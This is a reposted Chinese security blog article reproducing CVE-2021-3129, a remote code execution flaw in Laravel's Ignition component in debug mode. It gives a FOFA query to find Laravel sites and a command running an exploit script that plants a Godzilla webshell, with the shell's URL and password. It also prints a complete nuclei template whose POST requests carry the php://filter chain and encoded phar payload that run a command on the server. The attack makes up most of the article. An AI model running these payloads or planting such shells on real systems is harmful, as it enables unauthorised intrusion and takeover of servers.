CVE-2021-3129 Laravel Debug mode RCE,网络安全爱好者中心-神域博客网

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现 CVE-2021-3129 Laravel Debug mode RCE

0x01 阅读须知

资源来源于网络，安全小天地只是再次进行分享，使用请遵循本站的免责申明

0x02 漏洞描述

Laravel自带的Ignition组件在开启了Debug模式时，file_get_contents()和file_put_contents()函数使用存在不安全的可能性，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。默认情况下，laravel的日志文件是放置在storage/logs/laravel.log文件下，用来储存一些PHP的错误和一些堆栈追踪的相关信息。此时可以通过对该日志文件进行写操作，从而将该log文件变成恶意的phar文件。

图片[1]-CVE-2021-3129 Laravel Debug mode RCE-安全小天地

0x03 漏洞复现

漏洞影响: Laravel < 8.4.3、facade ignition < 2.5.2

FOFA:app=”Laravel”

1.执行RCE脚本写入哥斯拉shell

python3 laravel-CVE-2021-3129-EXP.py http://x.x.x.x:8080

图片[2]-CVE-2021-3129 Laravel Debug mode RCE-安全小天地

2.哥斯拉连接得到shell

地址：
http://192.168.31.111:8080/fuckyou.php

密码：
pass

3.nuclei漏洞脚本如下（nuclei稳定快，编写poc简单，有社区维护，推荐使用）

nuclei下载地址：https://github.com/projectdiscovery/nuclei


批量验证命令：
nuclei.exe -l subs.txt -t cves/2021/CVE-2021-3129.yaml

脚本：
id: CVE-2021-3129

info:
  name: Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution
  author: z3bd,pdteam
  severity: critical
  description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
  reference:
    - https://www.ambionics.io/blog/laravel-debug-rce
    - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3129
    - https://github.com/facade/ignition/pull/334
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3129
  tags: cve,cve2021,laravel,rce

requests:
  - raw:
      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json

        {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}

      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json

        {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}

      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json

        {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}

      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json

        {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}

      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json

        {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}

      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json

        {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500

      - type: word
        words:
          - \"uid=\"
          - \"gid=\"
          - \"groups=\"
          - \"Illuminate\"
        part: body
        condition: and

    extractors:
      - type: regex
        regex:
          - \"(u|g)id=.*\"

------本文已结束，感谢您的阅读------

THE END